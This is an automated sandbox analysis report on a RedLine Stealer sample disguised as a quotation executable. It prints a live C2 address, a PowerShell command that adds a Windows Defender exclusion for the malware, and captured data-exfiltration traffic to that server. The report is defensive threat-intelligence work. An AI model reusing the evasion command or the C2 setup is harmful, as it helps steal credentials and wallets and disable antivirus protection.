Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
QUOTATION#09678.exe

Overview

General Information

Sample name:QUOTATION#09678.exe
Analysis ID:1546607
MD5:4e5909728a72eb29f5cf1fe01867c982
SHA1:8d0638e33dd590d0ca6ad6918d7e3e25762613d4
SHA256:e87c540a4074fccadf3a56a1a0ef71bc952382d21c366c2a969e8d52bb25d609
Tags:exeRedLineStealeruser-abuse_ch
Infos:

Detection

RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected RedLine Stealer
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Disables UAC (registry)
Found many strings related to Crypto-Wallets (likely being stolen)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses known network protocols on non-standard ports
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file does not import any functions
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • QUOTATION#09678.exe (PID: 764 cmdline: "C:\Users\user\Desktop\QUOTATION#09678.exe" MD5: 4E5909728A72EB29F5CF1FE01867C982)
    • conhost.exe (PID: 6008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 3992 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTATION#09678.exe" -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7064 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • InstallUtil.exe (PID: 5652 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
      • conhost.exe (PID: 1520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • InstallUtil.exe (PID: 3712 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
    • WerFault.exe (PID: 3808 cmdline: C:\Windows\system32\WerFault.exe -u -p 764 -s 1056 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

Threatname: RedLine

{"C2 url": ["94.141.120.6:55123"], "Bot Id": "nwa"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security
    dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000005.00000002.2385941630.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000005.00000002.2385941630.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
          00000005.00000002.2385941630.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_f54632ebunknownunknown
          • 0x133ca:$a4: get_ScannedWallets
          • 0x12228:$a5: get_ScanTelegram
          • 0x1304e:$a6: get_ScanGeckoBrowsersPaths
          • 0x10e6a:$a7: <Processes>k__BackingField
          • 0xed7c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
          • 0x1079e:$a9: <ScanFTP>k__BackingField
          00000000.00000002.2268869258.000002CC91C21000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000000.00000002.2268869258.000002CC91C21000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
              Click to see the 10 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              5.2.InstallUtil.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                5.2.InstallUtil.exe.400000.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                  5.2.InstallUtil.exe.400000.0.unpackWindows_Trojan_RedLineStealer_f54632ebunknownunknown
                  • 0x135ca:$a4: get_ScannedWallets
                  • 0x12428:$a5: get_ScanTelegram
                  • 0x1324e:$a6: get_ScanGeckoBrowsersPaths
                  • 0x1106a:$a7: <Processes>k__BackingField
                  • 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
                  • 0x1099e:$a9: <ScanFTP>k__BackingField
                  5.2.InstallUtil.exe.400000.0.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                  • 0x1048a:$u7: RunPE
                  • 0x13b41:$u8: DownloadAndEx
                  • 0x9130:$pat14: , CommandLine:
                  • 0x13079:$v2_1: ListOfProcesses
                  • 0x1068b:$v2_2: get_ScanVPN
                  • 0x1072e:$v2_2: get_ScanFTP
                  • 0x1141e:$v2_2: get_ScanDiscord
                  • 0x1240c:$v2_2: get_ScanSteam
                  • 0x12428:$v2_2: get_ScanTelegram
                  • 0x124ce:$v2_2: get_ScanScreen
                  • 0x13216:$v2_2: get_ScanChromeBrowsersPaths
                  • 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths
                  • 0x13509:$v2_2: get_ScanBrowsers
                  • 0x135ca:$v2_2: get_ScannedWallets
                  • 0x135f0:$v2_2: get_ScanWallets
                  • 0x13610:$v2_3: GetArguments
                  • 0x11cd9:$v2_4: VerifyUpdate
                  • 0x165e6:$v2_4: VerifyUpdate
                  • 0x139ca:$v2_5: VerifyScanRequest
                  • 0x130c6:$v2_6: GetUpdates
                  • 0x165c7:$v2_6: GetUpdates
                  0.2.QUOTATION#09678.exe.2cc91c398f8.1.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    Click to see the 15 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTATION#09678.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTATION#09678.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\QUOTATION#09678.exe", ParentImage: C:\Users\user\Desktop\QUOTATION#09678.exe, ParentProcessId: 764, ParentProcessName: QUOTATION#09678.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTATION#09678.exe" -Force, ProcessId: 3992, ProcessName: powershell.exe
                    Sigma detected: Powershell Defender Exclusion
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTATION#09678.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTATION#09678.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\QUOTATION#09678.exe", ParentImage: C:\Users\user\Desktop\QUOTATION#09678.exe, ParentProcessId: 764, ParentProcessName: QUOTATION#09678.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTATION#09678.exe" -Force, ProcessId: 3992, ProcessName: powershell.exe
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTATION#09678.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTATION#09678.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\QUOTATION#09678.exe", ParentImage: C:\Users\user\Desktop\QUOTATION#09678.exe, ParentProcessId: 764, ParentProcessName: QUOTATION#09678.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTATION#09678.exe" -Force, ProcessId: 3992, ProcessName: powershell.exe

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-01T08:37:15.616264+010020229301A Network Trojan was detected4.245.163.56443192.168.2.549714TCP
                    2024-11-01T08:37:53.032015+010020229301A Network Trojan was detected172.202.163.200443192.168.2.549907TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-01T08:37:07.276183+010020450001Malware Command and Control Activity Detected94.141.120.655123192.168.2.549704TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-01T08:37:10.843296+010020460561A Network Trojan was detected94.141.120.655123192.168.2.549704TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-01T08:37:10.843296+010020450011Malware Command and Control Activity Detected94.141.120.655123192.168.2.549704TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-01T08:37:02.327438+010028496621Malware Command and Control Activity Detected192.168.2.54970494.141.120.655123TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-01T08:37:07.762128+010028493511Malware Command and Control Activity Detected192.168.2.54970494.141.120.655123TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-01T08:37:23.636487+010028482001Malware Command and Control Activity Detected192.168.2.54975494.141.120.655123TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-01T08:37:10.894641+010028493521Malware Command and Control Activity Detected192.168.2.54971294.141.120.655123TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Found malware configuration
                    Source: 5.2.InstallUtil.exe.400000.0.unpackMalware Configuration Extractor: RedLine {"C2 url": ["94.141.120.6:55123"], "Bot Id": "nwa"}
                    Multi AV Scanner detection for domain / URL
                    Source: 94.141.120.6:55123Virustotal: Detection: 15%Perma Link
                    Multi AV Scanner detection for submitted file
                    Source: QUOTATION#09678.exeVirustotal: Detection: 31%Perma Link
                    Source: QUOTATION#09678.exeReversingLabs: Detection: 28%
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for sample
                    Source: QUOTATION#09678.exeJoe Sandbox ML: detected

                    Exploits

                    barindex
                    Yara detected UAC Bypass using CMSTP
                    Source: Yara matchFile source: 00000000.00000002.2268426696.000002CC81774000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: QUOTATION#09678.exe PID: 764, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\installutil.exe.logJump to behavior
                    Source: QUOTATION#09678.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WER9462.tmp.dmp.10.dr
                    Source: Binary string: System.Windows.Forms.pdb source: WER9462.tmp.dmp.10.dr
                    Source: Binary string: mscorlib.pdb source: WER9462.tmp.dmp.10.dr
                    Source: Binary string: System.ni.pdbRSDS source: WER9462.tmp.dmp.10.dr
                    Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER9462.tmp.dmp.10.dr
                    Source: Binary string: System.Windows.Forms.pdb0 source: WER9462.tmp.dmp.10.dr
                    Source: Binary string: System.Drawing.pdb source: WER9462.tmp.dmp.10.dr
                    Source: Binary string: System.Windows.Forms.ni.pdb source: WER9462.tmp.dmp.10.dr
                    Source: Binary string: mscorlib.ni.pdb source: WER9462.tmp.dmp.10.dr
                    Source: Binary string: System.Drawing.ni.pdb source: WER9462.tmp.dmp.10.dr
                    Source: Binary string: System.Core.pdb source: WER9462.tmp.dmp.10.dr
                    Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER9462.tmp.dmp.10.dr
                    Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER9462.tmp.dmp.10.dr
                    Source: Binary string: System.Drawing.ni.pdbRSDS source: WER9462.tmp.dmp.10.dr
                    Source: Binary string: System.ni.pdb source: WER9462.tmp.dmp.10.dr
                    Source: Binary string: System.pdb source: WER9462.tmp.dmp.10.dr
                    Source: Binary string: System.Core.ni.pdbRSDS source: WER9462.tmp.dmp.10.dr
                    Source: Binary string: System.Core.pdbM source: WER9462.tmp.dmp.10.dr
                    Source: Binary string: System.Core.ni.pdb source: WER9462.tmp.dmp.10.dr
                    Source: Binary string: Microsoft.VisualBasic.pdb source: WER9462.tmp.dmp.10.dr

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.5:49704 -> 94.141.120.6:55123
                    Source: Network trafficSuricata IDS: 2045000 - Severity 1 - ET MALWARE RedLine Stealer - CheckConnect Response : 94.141.120.6:55123 -> 192.168.2.5:49704
                    Source: Network trafficSuricata IDS: 2849352 - Severity 1 - ETPRO MALWARE RedLine - SetEnvironment Request : 192.168.2.5:49712 -> 94.141.120.6:55123
                    Source: Network trafficSuricata IDS: 2849351 - Severity 1 - ETPRO MALWARE RedLine - EnvironmentSettings Request : 192.168.2.5:49704 -> 94.141.120.6:55123
                    Source: Network trafficSuricata IDS: 2045001 - Severity 1 - ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound : 94.141.120.6:55123 -> 192.168.2.5:49704
                    Source: Network trafficSuricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 94.141.120.6:55123 -> 192.168.2.5:49704
                    Source: Network trafficSuricata IDS: 2848200 - Severity 1 - ETPRO MALWARE RedLine - GetUpdates Request : 192.168.2.5:49754 -> 94.141.120.6:55123
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorURLs: 94.141.120.6:55123
                    Uses known network protocols on non-standard ports
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 55123
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55123 -> 49704
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 55123
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55123 -> 49704
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 55123
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55123 -> 49712
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 55123
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55123 -> 49754
                    Source: global trafficTCP traffic: 192.168.2.5:49704 -> 94.141.120.6:55123
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 94.141.120.6:55123Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 94.141.120.6:55123Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 94.141.120.6:55123Content-Length: 954986Expect: 100-continueAccept-Encoding: gzip, deflate
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 94.141.120.6:55123Content-Length: 954978Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                    Source: Joe Sandbox ViewASN Name: UNITLINE_RST_NET1RostovnaDonuRU UNITLINE_RST_NET1RostovnaDonuRU
                    Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.5:49714
                    Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.5:49907
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.6
                    Source: global trafficDNS traffic detected: DNS query: api.ip.sb
                    Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 94.141.120.6:55123Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                    Source: InstallUtil.exe, 00000005.00000002.2386917577.0000000003061000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2386917577.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2386917577.00000000031DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.141.120.6:55123
                    Source: InstallUtil.exe, 00000005.00000002.2386917577.0000000003061000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.141.120.6:55123/
                    Source: InstallUtil.exe, 00000005.00000002.2386917577.00000000031DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.141.120.6:55123t-
                    Source: InstallUtil.exe, 00000005.00000002.2386917577.00000000030F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
                    Source: InstallUtil.exe, 00000005.00000002.2386917577.0000000003061000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                    Source: InstallUtil.exe, 00000005.00000002.2386917577.00000000030CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                    Source: InstallUtil.exe, 00000005.00000002.2386917577.0000000003061000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                    Source: InstallUtil.exe, 00000005.00000002.2386917577.0000000003061000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX
                    Source: InstallUtil.exe, 00000005.00000002.2386917577.0000000003061000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                    Source: InstallUtil.exe, 00000005.00000002.2386917577.0000000003061000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: InstallUtil.exe, 00000005.00000002.2386917577.00000000031DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                    Source: InstallUtil.exe, 00000005.00000002.2386917577.0000000003061000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/0
                    Source: InstallUtil.exe, 00000005.00000002.2386917577.0000000003061000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
                    Source: InstallUtil.exe, 00000005.00000002.2386917577.0000000003061000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
                    Source: InstallUtil.exe, 00000005.00000002.2386917577.0000000003061000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2386917577.00000000030B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
                    Source: InstallUtil.exe, 00000005.00000002.2386917577.0000000003061000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
                    Source: InstallUtil.exe, 00000005.00000002.2386917577.00000000031DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
                    Source: InstallUtil.exe, 00000005.00000002.2386917577.0000000003061000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
                    Source: InstallUtil.exe, 00000005.00000002.2386917577.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2386917577.00000000031DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
                    Source: InstallUtil.exe, 00000005.00000002.2386917577.0000000003061000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
                    Source: InstallUtil.exe, 00000005.00000002.2386917577.0000000003061000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
                    Source: InstallUtil.exe, 00000005.00000002.2386917577.0000000003061000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
                    Source: Amcache.hve.10.drString found in binary or memory: http://upx.sf.net
                    Source: tmp819F.tmp.5.dr, tmp49EE.tmp.5.dr, tmp4A0F.tmp.5.dr, tmp49FE.tmp.5.dr, tmp814F.tmp.5.dr, tmpB88F.tmp.5.dr, tmpB87F.tmp.5.dr, tmp817E.tmp.5.dr, tmp4A40.tmp.5.dr, tmp4A20.tmp.5.dr, tmpB8AF.tmp.5.dr, tmpB8B0.tmp.5.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: InstallUtil.exe, 00000005.00000002.2386917577.00000000030B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb
                    Source: InstallUtil.exe, 00000005.00000002.2386917577.00000000030B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/geoip
                    Source: QUOTATION#09678.exe, 00000000.00000002.2268869258.000002CC91C21000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2385941630.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
                    Source: QUOTATION#09678.exe, 00000000.00000002.2268869258.000002CC91C21000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2385941630.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
